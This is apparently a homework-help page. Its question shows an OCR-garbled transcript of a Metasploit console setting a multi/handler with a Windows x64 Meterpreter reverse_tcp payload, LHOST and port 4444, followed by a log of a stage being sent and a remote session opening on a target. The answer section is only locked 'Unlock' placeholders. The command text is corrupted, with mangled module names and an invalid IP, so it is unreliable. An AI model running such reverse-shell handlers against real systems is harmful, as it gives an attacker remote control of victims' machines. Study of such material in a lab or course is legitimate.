Question: ` ` ` Exploit target: Id Name - - - . . - 0 Wildcard Target 1 5 f 6 exploit ( nulat / nnmater

```
Exploit target:
Id Name
---..-
0 Wildcard Target
15f6 exploit(nulat/nnmater)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse tcp
15f6 exploit(mlit/handler)> set lhost 20220.2.4
.host =>202.20.2.4
usf6 exploit(mblti/nanther)> set lport 4444
port =>4444
15f6 exploit(multi/handler)> run
```
-1 Started reverse TCP handler on 202.20.2.4:4444
*] Sending stage (200262 bytes) to 201.10.1.1
-1 Meterpreter session 1 opened (202.20.2.4:4444->201.10.1.1:49931) at 2022-01-0513:46
` ` ` Exploit target: Id Name - - - . . - 0

Step by Step Solution

There are 3 Steps involved in it

1 Expert Approved Answer
Step: 1 Unlock blur-text-image
Question Has Been Solved by an Expert!

Get step-by-step solutions from verified subject matter experts

Step: 2 Unlock
Step: 3 Unlock

Students Have Also Explored These Related Programming Questions!